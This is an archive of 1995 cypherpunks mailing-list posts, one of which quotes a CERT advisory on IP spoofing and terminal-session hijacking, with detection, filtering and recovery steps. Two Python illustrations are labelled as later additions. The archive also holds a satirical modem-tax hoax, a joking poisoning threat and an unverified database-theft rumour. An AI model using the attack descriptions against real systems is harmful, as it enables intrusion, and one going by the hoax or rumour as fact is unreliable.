Subject: <none specified>
Message-ID: <199501260516.AAA17150@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My apologies if this has already made it to the list.

In article <D2wtJC.C8I@freenet.carleton.ca> you wrote:

: In a previous posting, Farrell McGovern (ai474@FreeNet.Carleton.CA) writes:
: > 	CNN Headline news this morning is running a story saying how the
: > Internet is so insecure that "hackers" can access former VP Quayle's
: > medical records, number of atomic warheads in a certain state and CIA's
: > budget. And all this is supposedly based upon a "breakthrough" that
: > "hackers" have made recently. They say that the Internet will not be able
: > to be secure for at least 5 years.

: 	Here's more about it!

:  
: Article #36 (36 is last):
: Newsgroups: comp.security.announce
: From: ecd@why.cert.org (Edward DeHart)
: Subject: IP Spoofing Attacks and Hijacked Terminal Connections
: Date: Mon Jan 23 16:00:37 1995
: =============================================================================
: CA-95:01                         CERT Advisory
:                                 January 23, 1995
:                 IP Spoofing Attacks and Hijacked Terminal Connections
: -----------------------------------------------------------------------------
: The CERT Coordination Center has received reports of attacks in which
: intruders create packets with spoofed source IP addresses. These attacks
: exploit applications that use authentication based on IP addresses. This
: exploitation leads to user and possibly root access on the targeted system.
: Note that this attack does not involve source routing. Recommended solutions
: are described in Section III below.
: In the current attack pattern, intruders may dynamically modify the kernel of
: a Sun 4.1.X system once root access is attained.  In this attack, which is
: separate from the IP spoofing attack, intruders use a tool to take control of
: any open terminal or login session from users on the system. Note that
: although the tool is currently being used primarily on SunOS 4.1.x systems,
: the system features that make this attack possible are not unique to SunOS.
:  
: As we receive additional information relating to this advisory, we will place
: it, along with any clarifications, in a CA-95:01.README file. CERT advisories
: and their associated README files are available by anonymous FTP from
: info.cert.org. We encourage you to check the README files regularly for
: updates on advisories that relate to your site.
:  
: -----------------------------------------------------------------------------
:  
: I.   Description
:  
:      This description summarizes both the IP spoofing technique that can
:      lead to root access on a system and the tool that intruders are using to
:      take over open terminal and login connections after they get root access.
:      We are currently seeing attacks in which intruders combine IP spoofing
:      with use of the tool. However, these are two separate actions. Intruders
:      can use IP spoofing to gain root access for any purpose; similarly, they
:      can highjack terminal connections regardless of their method of gaining
:      root access.
:  
:      IP spoofing
:         To gain access, intruders create packets with spoofed source IP
:         addresses. This exploits applications that use authentication based
:         on IP addresses and leads to unauthorized user and possibly root access
:         on the targeted system. It is possible to route packets through
:         filtering-router firewalls if they are not configured to filter
:         incoming packets whose source address is in the local domain. It
:         is important to note that the described attack is possible even if
:         no reply packets can reach the attacker.
:  
:         Examples of configurations that are potentially vulnerable include
:         - routers to external networks that support multiple internal
:           interfaces
:         - routers with two interfaces that support subnetting on the
:           internal network
:         - proxy firewalls where the proxy applications use the source
:           IP address for authentication
:  
:         The IP spoofing attacks we are currently seeing are similar to those
:         described in two papers: 1) "Security Problems in the TCP/IP Protocol
:         Suite" by Steve Bellovin, published in _Computer Communication Review_
:         vol. 19, no. 2 (April 1989) pages 32-48; 2) "A Weakness in the 4.2BSD
:         Unix TCP/IP Software" by Robert T. Morris. Both papers are available
:         by anonymous FTP from
:  
:            ftp.research.att.com:/dist/internet_security
:  
:            Bellovin paper: ipext.ps.Z
:            Morris paper:   117.ps.Z
:  
:         Services that are vulnerable to the IP spoofing attack include
:            SunRPC & NFS
:            BSD UNIX "r" commands
:            anything wrapped by the tcp daemon wrappers - site dependent; check
:                your configuration
:            X windows
:            other applications that use source IP addresses for authentication
:  
:      Hijacking tool
:         Once the intruders have root access on a system, they can use a tool
:         to dynamically modify the UNIX kernel. This modification allows them
:         to hijack existing terminal and login connections from any user on the
:         system.
:  
:         In taking over the existing connections, intruders can bypass one-time
:         passwords and other strong authentication schemes by tapping the
:         connection after the authentication is complete. For example, a
:         legitimate user connects to a remote site through a login or terminal
:         session; the intruder hijacks the connection after the user has
:         completed the authentication to the remote location; the remote site
:         is now compromised. (See Section I for examples of vulnerable
:         configurations.)
:  
:         Currently, the tool is used primarily on SunOS 4.1.x systems. However,
:         the system features that make this attack possible are not unique to
:         SunOS.
:  
:  
: II. Impact
:  
:      Current intruder activity in spoofing source IP addresses can lead to
:      unauthorized remote root access to systems behind a filtering-router
:      firewall.
:  
:      After gaining root access and taking over existing terminal and login
:      connections, intruders can gain access to remote hosts.
:  
:  
: III. Solutions
:  
:      A. Detection
:  
:         IP spoofing
:            If you monitor packets using network-monitoring software such as
:            netlog, look for a packet on your external interface that has
:            both its source and destination IP addresses in your local domain.
:            If you find one, you are currently under attack. Netlog is
:            available by anonymous FTP from
:               net.tamu.edu:/pub/security/TAMU/netlog-1.2.tar.gz
:               MD5 checksum: 1dd62e7e96192456e8c75047c38e994b
:  
:            Another way to detect IP spoofing is to compare the process
:            accounting logs between systems on your internal network. If
:            the IP spoofing attack has succeeded on one of your systems,
:            you may get a log entry on the victim machine showing a remote
:            access; on the apparent source machine, there will be no
:            corresponding entry for initiating that remote access.
:  
:         Hijacking tool
:            When the intruder attaches to an existing terminal or login
:            connection, users may detect unusual activity, such as commands
:            appearing on their terminal that they did not type or a blank
:            window that will no longer respond to their commands. Encourage your users
:            to inform you of any such activity. In addition, pay particular
:            attention to connections that have been idle for a long time.
:  
:            Once the attack is completed, it is difficult to detect. However,
:            the intruders may leave remnants of their tools. For example, you
:            may find a kernel streams module designed to tap into existing TCP
:            connections.
:  
:      B. Prevention
:  
:         IP spoofing
:            The best method of preventing the IP spoofing problem is to install
:            a filtering router that restricts the input to your external
:            interface (known as an input filter) by not allowing a packet
:            through if it has a source address from your internal network. In
:            addition, you should filter outgoing packets that have a source
:            address different from your internal network in order to prevent
:            a source IP spoofing attack originating from your site.
:  
:            The following vendors have reported support for this feature:
:              Bay Networks/Wellfleet routers, version 5 and later
:              Cabletron - LAN Secure
:              Cisco - RIS software all releases of version 9.21 and later
:              Livingston - all versions
:  
:            If you need more information about your router or about firewalls,
:            please contact your vendor directly.
:  
:            If your vendor's router does not support filtering on the inbound
:            side of the interface or if there will be a delay in incorporating
:            the feature into your system, you may filter the spoofed IP packets
:            by using a second router between your external interface and your
:            outside connection. Configure this router to block, on the outgoing
:            interface connected to your original router, all packets that
:            have a source address in your internal network. For this purpose, you can
:            use a filtering router or a UNIX system with two interfaces that
:            supports packet filtering.
:  
:            NOTE: Disabling source routing at the router does not protect you
:                  from this attack, but it is still good security practice to
:                  do so.
:  
:         Hijacking tool
:            There is no specific way to prevent use of the tool other than
:            preventing intruders from gaining root access in the first place.
:            If you have experienced a root compromise, see Section C for
:            general instructions on how to recover.
:  
:      C. Recovery from a UNIX root compromise
:  
:         1. Disconnect from the network or operate the system in
:            single-user mode during the recovery.  This will keep users
:            and intruders from accessing the system.
:  
:         2. Verify system binaries and configuration files against the
:            vendor's media (do not rely on timestamp information to
:            provide an indication of modification).  Do not trust any
:            verification tool such as cmp(1) located on the compromised
:            system as it, too, may have been modified by the intruder.
:            In addition, do not trust the results of the standard UNIX
:            sum(1) program as we have seen intruders modify system
:            files in such a way that the checksums remain the same.
:            Replace any modified files from the vendor's media, not
:            from backups.
:                                 -- or --
:  
:            Reload your system from the vendor's media.
:  
:         3. Search the system for new or modified setuid root files.
:  
:                 find / -user root -perm -4000 -print
:  
:            If you are using NFS or AFS file systems, use ncheck to
:            search the local file systems.
:  
:                 ncheck -s /dev/sd0a
:  
:         4. Change the password on all accounts.
:  
:         5. Don't trust your backups for reloading any file used by
:            root.  You do not want to re-introduce files altered by an
:            intruder.
:  
: ---------------------------------------------------------------------------
: The CERT Coordination Center thanks Eric Allman, Steve Bellovin, Keith Bostic,
: Bill Cheswick, Mike Karels, and Tsutomu Shimomura for contributing to our
: understanding of these problems and their solutions.
: ---------------------------------------------------------------------------
:  
: If you believe that your system has been compromised, contact the CERT
: Coordination Center or your representative in Forum of Incident
: Response and Security Teams (FIRST).
:  
: If you wish to send sensitive incident or vulnerability information to
: CERT staff by electronic mail, we strongly advise that the e-mail be
: encrypted.  The CERT Coordination Center can support a shared DES key, PGP
: (public key available via anonymous FTP on info.cert.org), or PEM (contact
: CERT staff for details).
:  
: Internet E-mail: cert@cert.org
: Telephone: +1 412-268-7090 (24-hour hotline)
:            CERT personnel answer 8:30 a.m.-5:00 p.m. EST(GMT-5)/EDT(GMT-4),
:            and are on call for emergencies during other hours.
: Fax: +1 412-268-6989
:  
: CERT Coordination Center
: Software Engineering Institute
: Carnegie Mellon University
: Pittsburgh, PA 15213-3890
: USA
:  
: Past advisories, CERT bulletins, information about FIRST representatives,
: and other information related to computer security are available for anonymous
: FTP from info.cert.org.
:  
:  
:  
: CERT is a service mark of Carnegie Mellon University.
:  
: -------------------------------

: --
: ------------------------------------------------------------------------
: The Information Cowpath is strewn with Meadow Muffins...even the best of
: us get the Meadow Muffin Blues every now and then...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLycwFyoZzwIn1bdtAQH7lQGAqGZx0JupR5oLwwm9wcJkhwZLks3Y1y36
4F9UjunJWFS4sKbts6eLkAT3jakXpTXT
=3rGy
-----END PGP SIGNATURE-----
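
The detection and filtering rules in the CERT advisory quoted above, written out as an added example (not part of the advisory or the original post). The address ranges, host names, the `Packet`/`Record` layouts and the 30-second matching window are constructed assumptions; real process accounting records look different.

```python
import ipaddress
from dataclasses import dataclass

# Constructed site: a documentation range stands in for "your internal network".
INTERNAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]


@dataclass(frozen=True)
class Packet:
    interface: str  # router interface the packet arrived on: "external" or "internal"
    src: str
    dst: str


@dataclass(frozen=True)
class Record:
    time: int       # seconds; both hosts are assumed to share a clock
    host: str       # host whose log holds this record
    peer: str       # other end of the remote access
    direction: str  # "in" = access received, "out" = access initiated


def is_internal(addr, nets=INTERNAL_NETS):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in nets)


def classify(pkt, nets=INTERNAL_NETS):
    """Apply the advisory's detection rule and its two filters to one packet."""
    src_in, dst_in = is_internal(pkt.src, nets), is_internal(pkt.dst, nets)
    if pkt.interface == "external":
        if src_in and dst_in:
            return "alert-spoof"   # detection rule: both addresses local, seen outside
        if src_in:
            return "drop-input"    # input filter: internal source arriving from outside
        return "pass"
    if pkt.interface == "internal":
        # outgoing filter: only internal source addresses may leave the site
        return "pass" if src_in else "drop-output"
    raise ValueError(f"unknown interface {pkt.interface!r}")


def uncorroborated(records, window=30):
    """Inbound accesses with no matching outbound entry on the apparent source."""
    outbound = [r for r in records if r.direction == "out"]
    suspicious = []
    for r in records:
        if r.direction != "in":
            continue
        matched = any(
            o.host == r.peer and o.peer == r.host and abs(o.time - r.time) <= window
            for o in outbound
        )
        if not matched:
            suspicious.append(r)
    return suspicious


# Constructed sample input.
SAMPLE_PACKETS = [
    Packet("external", "198.51.100.7", "192.0.2.10"),   # ordinary inbound traffic
    Packet("external", "192.0.2.20", "192.0.2.10"),     # local source seen on the outside
    Packet("external", "192.0.2.20", "203.0.113.5"),    # local source, outside destination
    Packet("internal", "192.0.2.10", "198.51.100.7"),   # ordinary outbound traffic
    Packet("internal", "203.0.113.9", "198.51.100.7"),  # foreign source leaving the site
]
SAMPLE_RECORDS = [
    Record(1000, "alpha", "beta", "out"),
    Record(1002, "beta", "alpha", "in"),   # corroborated by alpha's own log
    Record(5000, "beta", "gamma", "in"),   # gamma has no entry for starting this
    Record(9000, "gamma", "beta", "out"),  # too far from t=5000 to count
]

if __name__ == "__main__":
    for p in SAMPLE_PACKETS:
        print(p.interface, p.src, "->", p.dst, classify(p))
    for r in uncorroborated(SAMPLE_RECORDS):
        print("no initiating entry on", r.peer, "for access to", r.host, "at", r.time)
```
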




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Thu, 26 Jan 95 01:39:42 PST
To: nobody@rahul.net
Subject: Re: Identity
In-Reply-To: <199501252027.AA15453@bolero.rahul.net>
Message-ID: <Pine.SUN.3.91.950126012920.11763F-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 25 Jan 1995 nobody@rahul.net wrote:

> sorr@eznet.net wrote:
> 
> > To whomever:
> >   I'm a reporter at the daily newspapers in Rochester, N.Y., researching a 
> > story on the recent spate of IP-spoof hack events. Supposedly a toad.com 
> > address was used by a person who broke into the San Diego supercomputer center 
> > a month ago. What's toad.com? I got your name from a web search that found an 
> > old communique.
> >   Can you be any help? I'm simply trying to reconstruct what happened.
> > Steve Orr
> > Gannett Rochester Newspapers
> 
> Fuck Gannett.
> 
I'm afraid that  `nobody' is imperfect.

This reporter, who probably knows little about the Internet or any of the 
issues under discussion except what he has read in the press, has posted 
a presumably sincere request for information.  He is  *asking* to learn 
-- at the precise moment when serious threats to our freedom of 
expression are mounting in force -- and you answer by spitting in his face.
Believe me, those who wish to shut us down and shut us up will be happy 
to talk to him.

And, nobody, the article he writes will help to shape the popular 
conception of what this net is all about; and that conception, in the 
end, will determine its fate.

So I hope that someone else on this list will favor him with a politer 
and more informative answer to his question.

Charles Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 25 Jan 95 22:39:23 PST
To: grendel@netaxs.com (Michael Handler)
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <Pine.SUN.3.91.950125210658.29117A-100000@unix2.netaxs.com>
Message-ID: <199501260638.BAA07072@duke.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| 	I have literally hundreds of messages archived from the CP list of
| several months back where Eric Hughes repeatedly states that reordering,
| not latency, is the key. Reordering of a sufficient magnitude will
| introduce latency inherently. Otherwise you are still vulnerable to 
| traffic analysis (which is an art, not a science, remember).

	Are you sure TA is still an art?  The NSA has (presumably)
spent thousands of man years on the problem.  Hal, Wei Dai and others
have done some very good work.  While I've only skimmed the surface of
it, it's clear that clever statistical work comprises a lot of TA.  It
may be that the FBI has a couple of Suns handling the whole remailer
network right now.

	Also, if anyone wants to look at the archives, the best thread
is subject reordering vs. latency.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Wed, 25 Jan 95 16:42:01 PST
To: cypherpunks@toad.com
Subject: Re: Modem Tax!--Write to FCC Commmissioner Craig Shergold
Message-ID: <199501260041.AA11547@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


>  	But, but... I heard that new members of BlackNet have to
>  kill a driver who flashes their headlights at them, as part
>  of an initiation rite. I know it's true: Klaus! told me so in
>  private e-mail. Is there any verification of this? I'm frightened...

If any more of this non-cypherpunks related stuff turns up on the list those responsible will be fed "Blue Star", "Sad Clown", and "Bart Simpson" blotter acid (free samples available at your local playground) till they die of strychnine poisoning!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KJC@cityscape.co.uk (KJC)
Date: Wed, 25 Jan 95 19:01:39 PST
To: cypherpunks@toad.com
Subject: RE:sorr
Message-ID: <199501260302.DAA18137@ns.cityscape.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

sorr@eznet.net wrote:

> To whomever:
>   I'm a reporter at the daily newspapers in Rochester, N.Y., researching a 
> story on the recent spate of IP-spoof hack events. Supposedly a toad.com 
> address was used by a person who broke into the San Diego supercomputer center
> a month ago. What's toad.com? ....I'm simply trying to reconstruct..

someone wrote anonymously:
> Fuck Gannett.

 L. Futplex McCarthy wrote:
>This belongs in private email, assuming that isolated epithets are worth
>sharing with anyone outside your primal scream therapy group.
  Are you related to Detweiler, perchance ?
 

etc,etc.
  Yep - A shame about being anonymous...because it was succinctly put - 
  but explanations to Steve Orr unnecessary - surely? Nevertheless, I'm
  glad it was said,
                   Keith Cross
  

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLycKfhZrmpTDhsYFAQHxpgQApvnrBVvnR6CzwF9t5dPYnsPu+laI3Q50
xNTdC3GInnBUXWscf9V/5mPETFUC8Pv+YG+umwHP1fxsnVG+yooRQvy7Vh4gyqvK
zB64Jsc+HLLRiee1vnczZ0kaBZJn6ajCzmGpJ1Q5Pof+GD4OirO9pZAAeUz88tPv
2EIFOxuT8z0=
=c7cc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Harvey <warrior@infinet.com>
Date: Thu, 26 Jan 95 02:25:13 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Modem Tax!--Write to FCC Commmissioner Craig Shergold
In-Reply-To: <199501251947.LAA04536@netcom3.netcom.com>
Message-ID: <Pine.3.89.9501260534.D23561-0100000@rigel>
MIME-Version: 1.0
Content-Type: text/plain



Tim,

Would you happen to have his email address?

Regards,
Dave


On Wed, 25 Jan 1995, Timothy C. May wrote:

> Perry E. Metzger wrote:
> > 
> > 
> > Oh no! The modem tax urban legend comes around again!
> > 
> 
> 
> I am shocked at this proposed modem tax, along with the keyboard tax,
> the printer tax, the mouse tax, and the cable tax.
> 
> FCC Commissioner Craig Shergold has asked that comment on this modem
> tax be sent on post cards to him. He is hoping to receive more
> postcards than any previous FCC Commissioner.
> 
> His address is:
> 
> FCC Commissioner Craig T. Shergold
> Room 101
> Ministry of Truth
> 42 Oceania Street, NW
> Washington, D.C. 10666
> 
> In a related note, opponents of this modem tax are encouraged to flash
> their headlights at oncoming traffic.
> 
> --Tim May
> 
> -- 
> ..........................................................................
> Timothy C. May         | Crypto Anarchy: encryption, digital money,  
> tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
>                        | knowledge, reputations, information markets, 
> W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
> Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
> Cypherpunks list: majordomo@toad.com with body message of only: 
> subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay
> 
> 
> 

___
            /\  PGP the Cutting Edge of Privacy.
/vvvvvvvvvvvv \-----------------------------------\
| WARRIOR   (  |     PGP Key Id 0XF4D9F5C5          > Magnus Frater Videt Tu
`^^^^^^^^^^^^ /===================================/
            \/  Finger for PGP 2.6.2 public Key.

      PGP Fingerprint 76 6F 4B 56 B1 AC 05 FE  BE 39 9D CC 18 E4 F6 68
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M. Harvey                                       warrior@infinet.com|
| PO Box 151311              	            dharvey@freenet.columbus.oh.us|
| Columbus, OH 43215-8311    	               fm063@cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Thu, 26 Jan 95 05:17:59 PST
To: cypherpunks@toad.com
Subject: Re: Reordering, not Latency
In-Reply-To: <199501260638.BAA07072@duke.bwh.harvard.edu>
Message-ID: <Zrv9laa0isxK078yn@ouray.denver.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 26 Jan, Adam Shostack <adam@bwh.harvard.edu> wrote:

> [quoting another Cypherpunk]
>  >>>> traffic analysis (which is an art, not a science, remember).
> 
> 	Are you sure TA is still an art?  The NSA has (presumably)
> spent thousands of man years on the problem.  Hal, Wei Dai and others
> have done some very good work.  While I've only skimmed the surface of
> it, it's clear that clever statistical work comprises a lot of TA.

Adam is correct, at least if you believe Bamford.  _The Puzzle Palace_
lists some of the courses in the NSA's 3-year Traffic Analysis Intern
Program, along with some entertaining questions from the Agency's
aptitude test designed to ferret out potential traffic analysts.  IMO,
far more science than art is involved.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.denver.colorado.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyegOlRRFMq4NZY5AQFACwP9F5usLixVxAm8SxMIK8D9SVWk6j3bWNwL
FgD9sgPGiPJnXhoJVG/OcJnxG1kyvYCiyA1D8WV8m4vMvVAoq83fvtXbCHYd7hit
TjkieVjajKthWDpRlcPaRYFv1QfVTuUHkYbTNZpCfhkcuDenPTe9Uo5ZeB/qWZUz
oe4eZWc3L10=
=87WF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Thu, 26 Jan 95 06:37:47 PST
To: cypherpunks@toad.com
Subject: anon.penet.fi compromise?
Message-ID: <199501261437.AA18444@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


This was in alt.2600.  Comments or verification?
---------------------------------

From: will@rmii.com (Will Spencer)
Newsgroups: alt.2600
Subject: Re: remailer security?
Date: 24 Jan 1995 15:48:57 -0700

Steve:

The penet database was stolen and posted on Unphamaliar Territories.

                                                                Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 26 Jan 95 08:50:23 PST
To: cypherpunks@toad.com
Subject: Re:  Reordering, not Latency (Was: Re: Remailer)
Message-ID: <199501261649.IAA21706@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Michael Handler <grendel@netaxs.com>
> On Wed, 25 Jan 1995 Louis Cypher wrote:
> 
> > In recent discussions, the consensus 
> > was that message reordering was superior to (and the actual intent of) 
> > latency.  Reordering is not sufficient, a form of latency is required 
> > to make it effective.
> 
> 	I have literally hundreds of messages archived from the CP list of
> several months back where Eric Hughes repeatedly states that reordering,
> not latency, is the key. Reordering of a sufficient magnitude will
> introduce latency inherently. Otherwise you are still vulnerable to 
> traffic analysis (which is an art, not a science, remember).

I think there is a small terminology problem here.  In Eric's writings,
latency refers to delaying message remailing; reordering refers to
sending messages in a different order than they arrive.  I think it is
obvious that reordering is necessary in order to have any mixing; latency
may provide reordering, but it is not guaranteed to do so.  Latency
without reordering is not of much use.

More recently the discussion has been contrasting simple batch reordering
versus a form of reordering where some messages are "carried over" from
one batch to the next.  In the recent context this carry-over process is
being referred to as adding latency.  I think the recent comments about
the advantages of latency refer to the additional statistical confusion
which this carry-over process may add.

So these comments don't contradict Eric's earlier statements, but rather
the terminology has shifted slightly.  Reordering is still the primary
necessity; now it appears that reordering with some latency (carry-over)
is superior to simple batch-based reordering.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLyfSgBnMLJtOy9MBAQH2CwH/WbGPjJmI8yDmlfOblU+fbC9+tlqILluQ
UpAxSFUg00u2QpHdA2a52Yvzb7Oi+oe6WvwdZ7SBFfbLTksa8Q8FVg==
=hWiJ
-----END PGP SIGNATURE-----
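
The contrast drawn in the message above between simple batch reordering and reordering with carry-over, as an added example that is not part of the original post. It assumes one simple carry-over model (a fixed-size pool, every held message equally likely to be sent each round); the batch and pool sizes are constructed, and the exact delay distribution goes slightly beyond what the message states.

```python
import random
from fractions import Fraction


def batch_mix(n_messages, batch_size, rng):
    """Simple batch reordering: wait for batch_size messages, shuffle, send all."""
    rounds = []
    for start in range(0, n_messages, batch_size):
        batch = list(range(start, min(start + batch_size, n_messages)))
        rng.shuffle(batch)
        rounds.append(batch)
    return rounds


def carry_over_mix(n_messages, batch_size, pool_size, rng):
    """Reordering with carry-over: after each arriving batch, shuffle everything
    held and send all but pool_size messages; the rest wait for a later round."""
    held, rounds = [], []
    for start in range(0, n_messages, batch_size):
        held.extend(range(start, min(start + batch_size, n_messages)))
        rng.shuffle(held)
        n_send = max(0, len(held) - pool_size)
        rounds.append(held[:n_send])
        held = held[n_send:]
    return rounds, held


def delays(rounds, batch_size):
    """Rounds each sent message waited: send round minus arrival round."""
    return [r - msg // batch_size for r, sent in enumerate(rounds) for msg in sent]


def arrival_rounds_per_output(rounds, batch_size):
    """For each output round, the arrival rounds an observer has to consider."""
    return [sorted({msg // batch_size for msg in sent}) for sent in rounds]


def delay_distribution(batch_size, pool_size, max_delay):
    """Exact P(delay = j rounds) once the pool is full: each round a held
    message stays behind with probability pool_size / (batch_size + pool_size)."""
    stay = Fraction(pool_size, batch_size + pool_size)
    return [stay ** j * (1 - stay) for j in range(max_delay + 1)]


if __name__ == "__main__":
    # Message ids are arrival order; id // batch_size is the arrival round.
    plain = batch_mix(50, 5, random.Random(1995))
    pooled, left = carry_over_mix(50, 5, 5, random.Random(1995))
    print("batch mix, arrival rounds per output:", arrival_rounds_per_output(plain, 5))
    print("carry-over, arrival rounds per output:", arrival_rounds_per_output(pooled, 5))
    print("still held at the end:", sorted(left))
    print("P(delay=j), batch 5 / pool 5:", delay_distribution(5, 5, 4))
```

With plain batching every output round maps back to exactly one arrival round, so an observer's candidate set is that one batch; with carry-over each output round draws from several earlier arrival rounds, which is the added statistical confusion the message refers to.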




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 26 Jan 95 09:30:35 PST
To: Brad Dolan <bdolan@well.sf.ca.us>
Subject: Re: Get ready to start breaking rocks for Herr Klinton
In-Reply-To: <199501260630.WAA24101@well.sf.ca.us>
Message-ID: <Pine.SUN.3.91.950126092056.277A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Well, there was one ray of hope in Klinton's Executive orders:


> . . .  
>                      EXECUTIVE ORDER
>   
>                       - - - - - - -
>   
>      PRESIDENT'S ADVISORY BOARD ON ARMS PROLIFERATION 
> 			 POLICY
>   
> . . .  
>        Section 1.  Establishment.  There is established 
>   within the Department of Defense the "President's 
>   Advisory Board on Arms Proliferation Policy" 
>   ("Board").  The Board shall consist of five members 
>   who shall be appointed by the President from among 
>   persons in private life who are noted for their 
>   stature and expertise regarding the proliferation of 
>   strategic and advanced conventional weapons and are 
>   from diverse backgrounds.  The President shall 
>   designate one of the members as Chairperson of the 
>   Board.
>   . . .

With his arms control policy background and current familiarity 
with crypto as non-exportable munition, Phil Zimmermann is a 
shoo-in for a seat on the president's Arms Proliferation Board.
Hell, he ought to be the Chairperson!


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sorr@roch0.eznet.net (Steve Orr)
Date: Thu, 26 Jan 95 06:48:49 PST
To: cypherpunks@toad.com
Subject: Okay, okay!!!!
Message-ID: <199501261437.JAA21887@roch0.eznet.net>
MIME-Version: 1.0
Content-Type: text/plain


To all list subscribers:
  I get the picture.
  I apologize for lurching into your space, but I had good reason. I was
trying to track down a bit of information. I tracked it down. The
information was right. Now I'm done.
  Thanks to all of you who took a moment to explain to me what toad.com is.
As for those who took a moment for abuse, hey, I don't care. I'm a
journalist. Taking random abuse is part of my job description.
  As I mentioned above, I have verified to my satisfaction that someone
"borrowed" the machine that runs toad.com and used it to commence burrowing
into the computer space of Tsutomu Shimomura, the San Diego
computer-security expert who got cracked in late December.
  Is this a big deal? No, not really. It's a line or two in the story I'm
writing, which seeks to detail the scope of the intrusions. The story's not
intended to scare people. Nor is it intended to hype anything.
  It's just a story.
  So that's that. Again, sorry for intruding and thanks for the help.
  You can return now to your regularly scheduled programming.
Steve Orr,
at the f****** Gannett Rochester Newspapers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Karl Lui Barrus <klbarrus@owlnet.rice.edu>
Date: Thu, 26 Jan 95 07:42:20 PST
To: morpheus@math.whitman.edu (Mo Baxter)
Subject: Re: Starting a remailer
In-Reply-To: <Pine.SOL.3.91.950125195543.7649A-100000@calvin>
Message-ID: <9501261541.AA10742@snowy.owlnet.rice.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mo Baxter wrote:
>I need info on what's needed to operate a secure remailer out of an edu
>address.  I'd appreciate anything about software, installation, maintenance,
>problems, etc... 

If you are thinking of setting up a remailer on a general usage type
unix shell account, then first find out if the usage policy allows you
to run one (for example, remailers are forbidden here at Rice).
Actually, I would recommend asking first, to head off future
headaches, as I can think of at least two other (former) remailers run at
.edu sites that were forced to close.

Other than that, try to find out if sendmail logs are kept, especially
if they are world readable (this will reduce the security of the
remailer, but you won't be able to do anything about it anyway).

The software is easily available, installation isn't hard (you have to
install PGP as well).  Maintenance isn't much unless you experiment
around.  I would recommend blocking anonymous mail to whitehouse.gov
and other similar addresses.

I don't know about problems; I never had any, but these days it seems
more and more people are finding out about remailers, and with that
comes abusers.  John Perry had to shut down because of abuse, after
withstanding the RC4 posting crisis.  Be prepared for some hassles.

Actually, I would recommend finding a remailer-friendly site like
c2.org and setting up there.

-- 
Karl L. Barrus: klbarrus@owlnet.rice.edu         
2.3: 5AD633;   D1 59 9D 48 72 E9 19 D5  3D F3 93 7E 81 B5 CC 32 
2.6: 088C8F21; 97 73 9E 8B 98 3E DD B5  E8 97 64 7E 20 95 60 D9
"One man's mnemonic is another man's cryptography" - K. Cooper



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
